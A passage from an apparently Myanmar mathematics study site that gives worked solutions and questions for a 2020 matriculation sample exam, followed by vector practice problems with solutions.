=1-P\text{ (all head)}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1-\displaystyle \frac{1}{{16}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{15}}{{16}}\\[2ex](\text{v})\ \text{The set of favourable outcomes for getting exactly one head}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,T,T,T),\text{ }(T,H,T,T),\text{ }(T,T,H,T),\text{ }(T,T,T,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 4}\\[2ex]\ \ \ \ P\text{ (getting exactly one head) =}\displaystyle \frac{4}{{16}}=\displaystyle \frac{1}{4}\end{array}$ SECTION (C) (Answer Any THREE questions.) 11 (a).   $PQR$ is a triangle inscribed in a circle. The tangent at $P$ meet $RQ$ produced at $T$,and $PC$ bisecting $\angle RPQ$ meets side $RQ$ at $C$. Prove $\triangle TPC$ is isosceles. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\angle TPC=\beta +\gamma \\[2ex]\angle R=\gamma \ \ \ [\angle \ \text{between tangent and chord}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\angle \ \text{in alternate segment }\!\!]\!\!\text{ }\\[2ex]\text{Since }PC\ \text{bisects}\ \angle RPQ,\ \\[2ex]\beta =\alpha \\[2ex]\therefore \angle TPC=\alpha +\angle R\\[2ex]\text{In}\ \triangle RPC,\ \angle PCT=\alpha +\angle R\\[2ex]\angle TPC=\angle PCT\\[2ex]\therefore \,\triangle TPC\ \text{is isosceles}\text{.}\end{array}$ 11 (b).   In $\triangle ABC$, $D$ is a point of $AC$ such that $AD = 2CD$. $E$ is on $BC$ such that $DE \parallel AB$. Compare the areas of $\triangle CDE$ and $\triangle ABC$. If $\alpha (ABED) = 40$, what is $\alpha(ΔABC)$? (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\ \ \ AD=\text{ }2CD\ \text{ }\!\![\!\!\text{ given }\!\!]\!\!\text{ }\\[2ex]\ \ \ DE\parallel AB\\[2ex]\therefore \ \triangle CAB\sim\triangle CDE\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (\triangle CDE)}}=\displaystyle \frac{{A{{C}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{{(AD+CD)}}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{{(2CD+CD)}}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{9C{{D}^{2}}}}{{C{{D}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =9\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (\triangle CAB)-\alpha (\triangle CDE)}}=\displaystyle \frac{9}{{9-1}}\\[2ex]\therefore \displaystyle \frac{{\alpha (\triangle CAB)}}{{\alpha (ABED)}}=\displaystyle \frac{9}{8}\\[2ex]\therefore \alpha (\triangle CAB)=\displaystyle \frac{9}{8}\alpha (ABED)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{9}{8}\times 40\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =45\ \text{sq-unit}\end{array}$ 12 (a).   If $L, M, N,$ are the middle points of the sides of the $\triangle ABC$, and $P$ is the foot of perpendicular from $A$ to $BC$. Prove that $L, N, P, M$ are concyclic. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Since }AP\bot BC\text{ and }M\text{ is the midpoint of }AC\text{, }\\[2ex]\text{a circle with centre }M\text{ and diameter }AC\text{ }\\[2ex]\text{will pass through }P\text{.}\\[2ex]\therefore MP\text{ = }MC\text{ }\!\![\!\!\text{ radii of }\odot M\text{ }\!\!]\!\!\text{ }\\[2ex]\therefore \gamma \ \text{=}\ \phi \text{.}\\[2ex]\text{Since }L\text{ and }N\text{ are the midpoints of }AB\text{ and }BC\text{, }\\[2ex]LN\parallel AC\ \text{and }LN=\displaystyle \frac{1}{2}AC.\\[2ex]\text{Similarly }LM\parallel BC\ \text{and }LM=\displaystyle \frac{1}{2}BC.\\[2ex]LMCN\ \text{is a parallelogram}\text{.}\\[2ex]\therefore \gamma \ \text{=}\theta \Rightarrow \phi \ \text{=}\theta \\[2ex]\text{Since}\ \phi +\angle MPN=\text{ }180{}^\circ ,\\[2ex]\ \theta +\angle MPN=\text{ }180{}^\circ ,\\[2ex]L,\ N,\ P,\ M\ \text{are concyclic}\text{.}\end{array}$ 12 (b).   Solve the equation $\displaystyle \sqrt{3}\cos \theta +\sin \theta =\sqrt{2}$ for $\displaystyle 0{}^\circ \le \theta \le 360{}^\circ$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\sqrt{3}\cos \theta +\sin \theta =\sqrt{2},\ 0{}^\circ \le \theta \le 360{}^\circ \\[2ex]\text{Let}\ R\cos \alpha =\sqrt{3}\ \text{and}\ R\sin \alpha =1\ \\[2ex]\text{where }R>0\ \text{and}\ \alpha <90{}^\circ .\\[2ex]\therefore {{R}^{2}}{{\cos }^{2}}\alpha +{{R}^{2}}{{\sin }^{2}}\alpha =3+1\\[2ex]\therefore \ {{R}^{2}}\left( {{{{\cos }}^{2}}\alpha +{{{\sin }}^{2}}\alpha } \right)=4\\[2ex]\therefore \ {{R}^{2}}=4\Rightarrow R=2\text{ }\\[2ex]\ \ \ \displaystyle \frac{{R\sin \alpha }}{{R\cos \alpha }}=\displaystyle \frac{1}{{\sqrt{3}}}\\[2ex]\therefore \ \tan \alpha =\ \displaystyle \frac{1}{{\sqrt{3}}}\Rightarrow \alpha =30{}^\circ \\[2ex]\text{Now}\ \ \ \sqrt{3}\cos \theta +\sin \theta \\[2ex]\ \ \ \ \ \ \ \ =R\cos \theta \cos \alpha +R\sin \theta \sin \alpha \\[2ex]\ \ \ \ \ \ \ \ =R\left( {\cos \theta \cos \alpha +\sin \theta \sin \alpha } \right)\\[2ex]\ \ \ \ \ \ \ \ =R\cos \left( {\theta -\alpha } \right)\\[2ex]\ \ \ \ \ \ \ \ =2\cos \left( {\theta -30{}^\circ } \right)\\[2ex]\therefore 2\cos \left( {\theta -30{}^\circ } \right)=\sqrt{2}\\[2ex]\therefore \cos \left( {\theta -30{}^\circ } \right)=\displaystyle \frac{{\sqrt{2}}}{2}\\[2ex]\therefore \theta -30{}^\circ =45{}^\circ \ \text{or}\ \theta -30{}^\circ =315{}^\circ \\[2ex]\therefore \theta =75{}^\circ \ \text{or}\ \theta =345{}^\circ \end{array}$ 13 (a).   In $\triangle ABC, AB = x, BC = x + 2$, $AC = x - 2$ where $x > 4$, prove that $\displaystyle \cos A=\frac{{x-8}}{{2(x-2)}}$. Find the integral values of $x$ for which $A$ is obtuse. (5 marks) Show/Hide Solution $\displaystyle \vartriangle ABC,AB=x,BC=x+2,AC=x-2,\ x>4$ $\displaystyle \cos A=\displaystyle \frac{{A{{B}^{2}}+A{{C}^{2}}-B{{C}^{2}}}}{{2\cdot AB\cdot AC}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}+{{{(x-2)}}^{2}}-{{{(x+2)}}^{2}}}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}+{{x}^{2}}-4x+4-{{x}^{2}}-4x-4}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{{{x}^{2}}-8x}}{{2\cdot x\cdot (x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{x(x-8)}}{{2x(x-2)}}$ $\displaystyle \ \ \ \ \ \ \ \ =\displaystyle \frac{{x-8}}{{2(x-2)}}$ $\displaystyle \text{Since} A\ \text{is obtuse}.$ $\displaystyle \cos A<0$ $\displaystyle \displaystyle \frac{{x-8}}{{2(x-2)}}<0$ $\displaystyle \text{Since}\ x>4,\ x-2>2.$ $\displaystyle \therefore x-8<0\Rightarrow x<8$ $\displaystyle \therefore 4$ \displaystyle \therefore \ \text{The integral value of }x\text{ are }5,\ 6\ \text{and }7.$13 (b). The sum of the perimeters of a circle and square is$k$, where$k$is some constant. Using calculus, prove that the sum of their areas is least, when the side of the square is double the radius of the circle. (5 marks) Show/Hide Solution$ \displaystyle \begin{array}{l}\begin{array}{*{20}{l}} {\text{ Let the side-length of a square be }x} \\[2ex] {\text{ and the radius of the circle be }r} \\[2ex] {\text{ Sum of perimeters }=k(\text{ given })} \\[2ex] {4x+2\pi r=k} \\[2ex] {\therefore r=\displaystyle \frac{{k-4x}}{{2\pi }}} \\[2ex] {\text{ Let the sum of the areas be }A.} \\[2ex] {\therefore A={{x}^{2}}+\pi {{r}^{2}}} \end{array}\\[2ex]\begin{array}{*{20}{l}} {\therefore A={{x}^{2}}+\pi {{{\left( {\displaystyle \frac{{k-4x}}{{2\pi }}} \right)}}^{2}}} \\[2ex] {\therefore A={{x}^{2}}+\displaystyle \frac{{{{{(k-4x)}}^{2}}}}{{4\pi }}} \\[2ex] {\displaystyle \frac{{dA}}{{dx}}=2x+\displaystyle \frac{{2(-4)(k-4x)}}{{4\pi }}} \\[2ex] {\quad =2\left( {x+\displaystyle \frac{{4x-k}}{\pi }} \right)} \\[2ex] {\quad =\displaystyle \frac{2}{\pi }[(\pi +4)x-k]} \end{array}\\[2ex]\begin{array}{*{20}{l}} {\displaystyle \frac{{dA}}{{dx}}=0\text{ when }\displaystyle \frac{2}{\pi }[(\pi +4)x-k]=0} \\[2ex] {\therefore (\pi +4)x-k=0\Rightarrow x=\displaystyle \frac{k}{{\pi +4}}} \\[2ex] {\displaystyle \frac{{{{d}^{2}}A}}{{d{{x}^{2}}}}=\displaystyle \frac{{2(\pi +4)}}{\pi }>0} \\[2ex] {\therefore A\text{ is minimum when }x=\displaystyle \frac{k}{{\pi +4}}} \end{array}\\[2ex]\therefore r=\displaystyle \frac{1}{{2\pi }}\left[ {k-\displaystyle \frac{{4k}}{{\pi +4}}} \right]\\[2ex]\ \ \ \ \ =\displaystyle \frac{1}{{2\pi }}\left[ {\displaystyle \frac{{\pi k+4k-4k}}{{\pi +4}}} \right]\\[2ex]\ \ \ \ \ =\displaystyle \frac{1}{2}\left( {\displaystyle \frac{k}{{\pi +4}}} \right)\\[2ex]\ \ \ \ \ =\displaystyle \frac{x}{2}\\[2ex]\therefore x=2r\\[2ex]\text{Hence the sum of their areas is least,}\\[2ex]\text{when the side of the square is double }\\[2ex]\text{the}\ \text{radius of the circle}\text{.}\end{array}$14 (a). The vector$ \overrightarrow{{OA}}$has magnitude$39$units and has the same direction as$ \displaystyle 5\hat{i}+12\hat{j}$. The vector$ \overrightarrow{{OB}}$has magnitude$25$units and has the same direction as$ \displaystyle -3\hat{i}+4\hat{j}$. Express$ \overrightarrow{{OA}}$and$ \overrightarrow{{OB}}$in terms of$ \hat{i}$and$\hat{j}$and find the magnitude of$ \overrightarrow{{AB}}.$(5 marks) Show/Hide Solution$ \displaystyle \begin{array}{*{20}{l}} {\text{ Let }\vec{p}=5\hat{\imath }+12\hat{\jmath }\text{ and }\vec{q}=-3\hat{\imath }+4\hat{\jmath }} \\[2ex] \begin{array}{l}\therefore \ |\vec{p}|=\sqrt{{{{5}^{2}}+{{{12}}^{2}}}}=\sqrt{{169}}=13\text{ and }\\[2ex]\ \ |\vec{q}|=\sqrt{{{{{(-3)}}^{2}}+{{4}^{2}}}}=\sqrt{{25}}=5\end{array} \\[2ex] \begin{array}{l}\therefore \hat{p}=\displaystyle \frac{{\vec{p}}}{{|\vec{p}|}}=\displaystyle \frac{1}{{13}}(5\hat{\imath }+12\hat{\jmath })\text{ and }\\[2ex]\ \ \ \hat{q}=\displaystyle \frac{{\vec{q}}}{{|\vec{q}|}}=\displaystyle \frac{1}{5}(-3\hat{\imath }+4\hat{\jmath })\end{array} \\[2ex] {\ \ \ |\overrightarrow{{OA}}|=39\text{ and }\overrightarrow{{OA}}\text{ has the same direction }\hat{p}.} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{OA}}=39\hat{p}\\[2ex]\ \ \ \ \ \ \ \ =39\times \displaystyle \frac{1}{{13}}(5\hat{\imath }+12\hat{\jmath })=15\hat{\imath }+36\hat{\jmath }\\[2ex]\ \ \ \ \ \ \ \ =15\hat{\imath }+36\hat{\jmath }\\[2ex]\begin{array}{*{20}{l}} \begin{array}{l}\text{ Similarly, }\\[2ex]\ \ |\overrightarrow{{OB}}|\ =25\text{ and }\overrightarrow{{OB}}\text{ has the same direction }\hat{q}\text{ }\text{. }\end{array} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{OB}}=25\hat{q}\\[2ex]\ \ \ \ \ \ \ \ =25\times \displaystyle \frac{1}{5}(-3\hat{\imath }+4\hat{\jmath })=-15\hat{\imath }+20\hat{\jmath }\\[2ex]\ \ \ \ \ \ \ \ =-15\hat{\imath }+20\hat{\jmath }\end{array} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\[2ex]\ \ \ \ \ \ \ \ =(-15\hat{\imath }+20\hat{\jmath })-(15\hat{\imath }+36\hat{\jmath })\\[2ex]\ \ \ \ \ \ \ \ =-30\hat{\imath }-16\hat{\jmath }\end{array} \\[2ex] \begin{array}{l}\therefore \ |\overrightarrow{{AB}}|\ =\sqrt{{{{{(-30)}}^{2}}+{{{(-16)}}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ =\sqrt{{1156}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ =34\end{array} \end{array}\end{array} \end{array}$14 (b). Find the coordinates of the stationary points of the curve$y = x\ln x - 2x$. Determine whether it is a maximum or a minimum point. (5 marks) Show/Hide Solution$ \displaystyle \begin{array}{*{20}{l}} {\text{Curve : }y=x\ln x-2x} \\[2ex] \begin{array}{l}\displaystyle \frac{{dy}}{{dx}}=x\left( {\displaystyle \frac{1}{x}} \right)+\ln x-2\\[2ex]\,\ \ \ \ =\ln x-1\end{array} \\[2ex] {\displaystyle \frac{{dy}}{{dx}}=0\text{ when }\ln x-1=0} \\[2ex] \begin{array}{l}\text{ln }x=1\\[2ex]x=e\left( {\ln x={{{\log }}_{e}}x} \right)\end{array} \\[2ex] \begin{array}{l}\text{When }x=e,\\[2ex]y=e\ln e-2e\\[2ex]\ \ \ =-e\end{array} \\[2ex] {\therefore \text{ The stationary point is }(e,-e)} \\[2ex] \begin{array}{l}\displaystyle \frac{{{{d}^{2}}y}}{{d{{x}^{2}}}}=\displaystyle \frac{1}{x}\\[2ex]{{\left. {\displaystyle \frac{{{{d}^{2}}y}}{{d{{x}^{2}}}}} \right|}_{{x=e}}}=\displaystyle \frac{1}{e}>0\end{array} \\[2ex] {\therefore (e,-e)\text{ is a minimum point}\text{. }} \end{array}$နားလည်လွယ်ကူစေရန် illustration ထည့်ပေးခြင်း ဖြစ်သည်။ ဖြေဆိုသည့်အခါ ပုံထည့်ဆွဲပေးရန်မလိုပါ။ 2020 MATRICULATION EXAMINATION Sample Question Set (3) MATHEMATICS Time allowed: 3hours WRITE YOUR ANSWERS IN THE ANSWER BOOKLET. SECTION (A) (Answer ALL questions.) 1 (a). Let$ \displaystyle f:R\backslash \{\pm 2\}\to R$be a function defined by$ \displaystyle f(x)=\frac{{3x}}{{{{x}^{2}}-4}}$.Find the positive value of$z$such that$f(z) = 1$. (3 marks) (b). If the polynomial$x^3 - 3x^2 + ax - b$is divided by$(x - 2 )$and$(x + 2)$, the remainders are$21$and$1$respectively. Find the values of$a$and$b$. (3 marks) 2(a). Find the middle term in the expansion of$(x^2 - 2y)^{10}$. (3 marks) (b). In a sequence if$u_1=1$and$u_{n+1}=u_n+3(n+1)$, find$u_5$. (3 marks) 3(a). If$ \displaystyle P=\left( {\begin{array}{*{20}{c}} x & {-4} \\ {8-y} & {-9} \end{array}} \right)$and$ \displaystyle {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\ {-7y} & 3 \end{array}} \right)$, find the values of$x$and$y$. (3 marks) (b). A bag contains tickets, numbered$11, 12, 13, ...., 30$. A ticket is taken out from the bag at random. Find the probability that the number on the drawn ticket is (i) a multiple of$7$(ii) greater than$15$and a multiple of$5$. (3 marks) 4(a). Draw a circle and a tangent$TAS$meeting it at$A$. Draw a chord$AB$making$ \displaystyle \angle TAB=\text{ }60{}^\circ $and another chord$BC \parallel TS$. Prove that$\triangle ABC$is equilateral. (3 marks) (b). If$ \displaystyle 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}$, show that the points$A, B$and$C$are collinear. (3 marks) 5(a). Solve the equation$2 \sin x \cos x -\cos x + 2\sin x - 1 = 0$for$ \displaystyle 0{}^\circ \le x\le \text{ }360{}^\circ $. (3 marks) (b). Differentiate$ \displaystyle y=\frac{1}{{\sqrt[3]{x}}}$from the first principles. (3 marks) SECTION (B) (Answer Any FOUR questions.) 6 (a). Given that Given$ \displaystyle A=\{x\in R|\ x\ne -\frac{1}{2},x\ne \frac{3}{2}\}$. If$f:A\to A$and$g:A\to A$are defined by$f(x)=\displaystyle \frac{3x-5}{2x+1}$and$g(x)=\displaystyle \frac{x+5}{3-2x}$, show that$f$and$g$are inverse of each other. (5 marks) (b). Given that$x^5 + ax^3 + bx^2 - 3 = (x^2 - 1) Q(x) - x - 2$, where$Q(x)$is a polynomial. State the degree of$Q (x)$and find the values of$a$and$b$. Find also the remainder when$Q (x)$is divided by$x + 2$. (5 marks) 7 (a). The binary operation$\odot$on$R$be defined by$x\odot y=x+y+10xy$Show that the binary operation is commutative. Find the values$b$such that$ (1\odot b)\odot b=485$. (5 marks) (b). If, in the expansion of$(1 + x)^m (1 – x)^n$, the coefficient of$x$and$x^2$are$-5$and$7$respectively, then find the value of$m$and$n$. (5 marks) 8 (a). Find the solution set in$R$for the inequation$2x (x + 2)\ge (x + 1) (x + 3)$and illustrate it on the number line. (5 marks) (b). If the$ {{m}^{{\text{th}}}}$term of an A.P. is$ \displaystyle \frac{1}{n}$and$ {{n}^{{\text{th}}}}$term is$ \displaystyle \frac{1}{m}$where$m\ne n$, then show that$u_{mn} = 1$. (5 marks) 9 (a). The sum of the first two terms of a geometric progression is$12$and the sum of the first four terms is$120$. Calculate the two possible values of the fourth term in the progression. (5 marks) (b). Given that$ A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\ {\sin \theta } & {\cos \theta } \end{array}} \right)$. If$A + A' = I$where$I$is a unit matrix of order$2$, find the value of$\theta$for$ \displaystyle 0{}^\circ <\theta <90{}^\circ $. (5 marks) 10 (a). The matrix$A$is given by$ \displaystyle A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\ 4 & 5 \end{array}} \right)$. (i) Prove that$A^2 = 7A + 2I$where$I$is the unit matrix of order$2$. (ii) Hence, show that$ \displaystyle {{A}^{{-1}}}=\frac{1}{2}~\left( {A-7I} \right)$. (5 marks) (b). Draw a tree diagram to list all possible outcomes when four fair coins are tossed simultaneously. Hence determine the probability of getting: (i) all heads, (ii) two heads and two tails, (iii) more tails than heads, (iv) at least one tail, (v) exactly one head. (5 marks) SECTION (C) (Answer Any THREE questions.) 11 (a).$PQR$is a triangle inscribed in a circle. The tangent at$P$meet$RQ$produced at$T$,and$PC$bisecting$\angle RPQ$meets side$RQ$at$C$. Prove$\triangle TPC$is isosceles. (5 marks) (b). In$\triangle ABC$,$D$is a point of$AC$such that$AD = 2CD$.$E$is on$BC$such that$DE \parallel AB$. Compare the areas of$\triangle CDE$and$\triangle ABC$. If$\alpha (ABED) = 40$, what is$\alpha(ΔABC)$? (5 marks) 12 (a). If$L, M, N,$are the middle points of the sides of the$\triangle ABC$, and$P$is the foot of perpendicular from$A$to$BC$. Prove that$L, N, P, M$are concyclic. (5 marks) (b). Solve the equation$\displaystyle \sqrt{3}\cos \theta +\sin \theta =\sqrt{2}$for$ \displaystyle 0{}^\circ \le \theta \le 360{}^\circ $. (5 marks) 13 (a). In$\triangle ABC, AB = x, BC = x + 2$,$AC = x – 2$where$x > 4$, prove that$ \displaystyle \cos A=\frac{{x-8}}{{2(x-2)}}$. Find the integral values of$x$for which$A$is obtuse. (5 marks) (b). The sum of the perimeters of a circle and square is$k$, where$k$is some constant. Using calculus, prove that the sum of their areas is least, when the side of the square is double the radius of the circle. (5 marks) 14 (a). The vector$ \overrightarrow{{OA}}$has magnitude$39$units and has the same direction as$ \displaystyle 5\hat{i}+12\hat{j}$. The vector$ \overrightarrow{{OB}}$has magnitude$25$units and has the same direction as$ \displaystyle -3\hat{i}+4\hat{j}$. Express$ \overrightarrow{{OA}}$and$ \overrightarrow{{OB}}$in terms of$ \hat{i}$and$\hat{j}$and find the magnitude of$ \overrightarrow{{AB}}.$(5 marks) (b). Find the coordinates of the stationary points of the curve$y = x\ln x - 2x$. Determine whether it is a maximum or a minimum point. (5 marks) Target Mathematics ၏ အစဉ်အလာအတိုင်း တက္ကသိုလ်ဝင်တန်း စာမေးပွဲကို ဝင်ရောက်ဖြေဆိုကြမည့် ကျောင်းသား/သူတို့အတွက် လေ့ကျင့်ရန် မေးခွန်းတစ်စုံ တင်ပြလိုက်ပါသည်။ လေ့ကျင့်ဖြေဆိုကြစေလိုပါသည်။ အဖြေများကို နောက်ရက်တွင် ဆက်လက် ဖော်ပြပေးပါမည်။ 1. Find the unit vector in the direction of$ \displaystyle \overrightarrow{{PQ}}$where$ \displaystyle P$and$ \displaystyle Q$are points$ \displaystyle (2, 3)$and$ \displaystyle (7, – 9)$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ P\operatorname{and}\ Q\ \text{are points}\ (2,3)\ \operatorname{and}\ (7,-9).\\\\\therefore \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} 2 \\ 3 \end{array}} \right)\ \operatorname{and}\ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} 7 \\ {-9} \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\ \overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-9} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 2 \\ 3 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 5 \\ {-12} \end{array}} \right)\\\\\therefore \ \ \left| {\ \overrightarrow{{PQ}}} \right|=\sqrt{{{{5}^{2}}+{{{\left( {-12} \right)}}^{2}}}}=13\\\\\therefore \ \ \text{The unit vector in }\\\ \ \ \ \text{the direction of}\ \ \ \ =\displaystyle \frac{{\overrightarrow{{PQ}}}}{{\left| {\ \overrightarrow{{PQ}}} \right|}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{{13}}\left( {\begin{array}{*{20}{c}} 5 \\ {-12} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {\displaystyle \frac{5}{{13}}} \\ {-\displaystyle \frac{{12}}{{13}}} \end{array}} \right)\end{array}$2. Given that$ \displaystyle \overrightarrow{{OP}}=\widehat{\text{i}}+2\widehat{\text{j}}$and$ \displaystyle \overrightarrow{{OQ}}=7\widehat{\text{i}}-4\widehat{\text{j}}$. Find the position vector of a point$ \displaystyle R$which lies on the line$ \displaystyle PQ$such that$ \displaystyle PR : RQ = 2 : 1$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\widehat{\text{i}}+2\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OQ}}=7\widehat{\text{i}}-4\widehat{\text{j}}\\\\\ \ \ \ \ PR:RQ=2:1\\\\\ \ \ \ \ \text{By section formula},\ \\\\\ \ \ \ \ \ \overrightarrow{{OR}}=\displaystyle \frac{{\left( {1\times \overrightarrow{{OP}}} \right)+\left( {2\times \overrightarrow{{OQ}}} \right)}}{{1+2}}\ \\\\\ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{3}\ \left[ {\widehat{\text{i}}+2\widehat{\text{j}}+2\left( {7\widehat{\text{i}}-4\widehat{\text{j}}} \right)} \right]\\\\\ \ \ \ \ \ \ \ \ \ \ \ =5\widehat{\text{i}}-2\widehat{\text{j}}\end{array}$3. If$ \displaystyle \overrightarrow{{OA}}=-5\widehat{\text{i}}+6\widehat{\text{j}}$,$ \displaystyle \overrightarrow{{OB}}=2\widehat{\text{i}}+5\widehat{\text{j}}$and$ \displaystyle \overrightarrow{{OC}}=9\widehat{\text{i}}+4\widehat{\text{j}}$, show that$ \displaystyle A, B$and$ \displaystyle C$are collinear. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=-5\widehat{\text{i}}+6\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=2\widehat{\text{i}}+5\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=9\widehat{\text{i}}+4\widehat{\text{j}}\\\ \ \ \ \ \\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {2\widehat{\text{i}}+5\widehat{\text{j}}} \right)-\left( {-5\widehat{\text{i}}+6\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =7\widehat{\text{i}}-\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {9\widehat{\text{i}}+4\widehat{\text{j}}} \right)-\left( {2\widehat{\text{i}}+5\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =7\widehat{\text{i}}-\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{BC}}\\\\\therefore \ \ \ A,B\ \operatorname{and}\ C\ \text{are collinear}.\end{array}$4. Given that$ \displaystyle \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right)$,$ \displaystyle \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)$and$ \displaystyle \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right)$. If$ \displaystyle P, Q$and$ \displaystyle R$are collinear, find the value of$ \displaystyle k$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{QR}}=\overrightarrow{{OR}}-\overrightarrow{{OQ}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 5 \\ 3 \end{array}} \right)\\\\\ \ \ \ \text{By the problem,}\ \\\\\ \ \ P,\ Q\ \operatorname{and}\ R\ \text{are collinear}.\\\\\therefore \ \ \text{Let}\ \overrightarrow{{PQ}}=h\overrightarrow{{QR}}\\\\\therefore \ \ \left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)=h\left( {\begin{array}{*{20}{c}} 5 \\ 3 \end{array}} \right)\\\\\ \ \ \ \left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {5h} \\ {3h} \end{array}} \right)\\\\\therefore \ \ 3h=3\\\\\ \ \ \ h=1\\\\\ \ \ \ -2-k=5h\\\\\ \ \ k=-2-5h\\\\\ \ \ k=-7\\\ \ \ \end{array}$5. Using a vector method, show that the points$ \displaystyle A (– 8, 10), B (– 1, 9)$and$ \displaystyle C (6, 8)$are collinear and hence find the ratio$ \displaystyle AB : BC$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=\left( {\begin{array}{*{20}{c}} {-8} \\ {10} \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OB}}=\left( {\begin{array}{*{20}{c}} 